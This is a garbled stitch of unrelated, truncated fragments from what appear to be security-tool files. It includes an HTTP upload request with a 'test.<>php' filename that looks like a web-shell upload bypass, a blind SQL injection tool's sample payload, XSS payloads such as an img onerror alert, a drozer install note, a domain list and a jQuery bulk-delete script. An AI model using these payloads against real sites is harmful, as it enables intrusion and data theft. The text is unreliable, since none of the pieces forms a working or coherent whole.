POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
#Based on https://blog.ropnop.com/installing-drozer-on-os-x-el-capitan/
#Install recent python 2 and virtualenvwrapper
brew install python
brew upgrade python
pip install virtualenvwrapper
#At this point if you try to run mkvirtualenv, you'll get an error message. To resolve, follow the instructions indicated in /usr/local/bin/virtualenvwrapper.sh. In my current copy, they are:
# 1. Create a directory to hold the virtual environments.
# (mkdir $HOME/.virtualenvs).
#!/usr/bin/env python3
# bbs.py - Blind Binary Search
# Author: Laureline David
#
# Sample Usage:
#
# ./bbs.py --method POST
# --true-url http://website.com/login
# --url http://website.com/login
# --len "login=%27+union+select+login+from+users+where+length%28login%29+%3c%3d+{:d}+#&pass=abc"
14 apple.com
40 vk.com
44 github.com
49 tumblr.com
55 dropbox.com
85 medium.com
87 paypal.com
92 icloud.com
100 booking.com
112 weebly.com
<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# safeseh_inspect.py
#
# Copyright 2014 Spencer McIntyre
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
$ = jQuery;
var indexToDelete = 0;
var numOfLinksToDelete = 200;
var waitUntilNextLinkInMs = 1000;
var waitForModalInMs = 50;
var confirmDelete = function() {
  setTimeout(function() {
    var $confirmationButtonInModal = $(".button-primary");
This page has migrated to:
https://superjamie.github.io/2016/04/28/reversing-for-dummies
<img/src/onerror=alert(1)>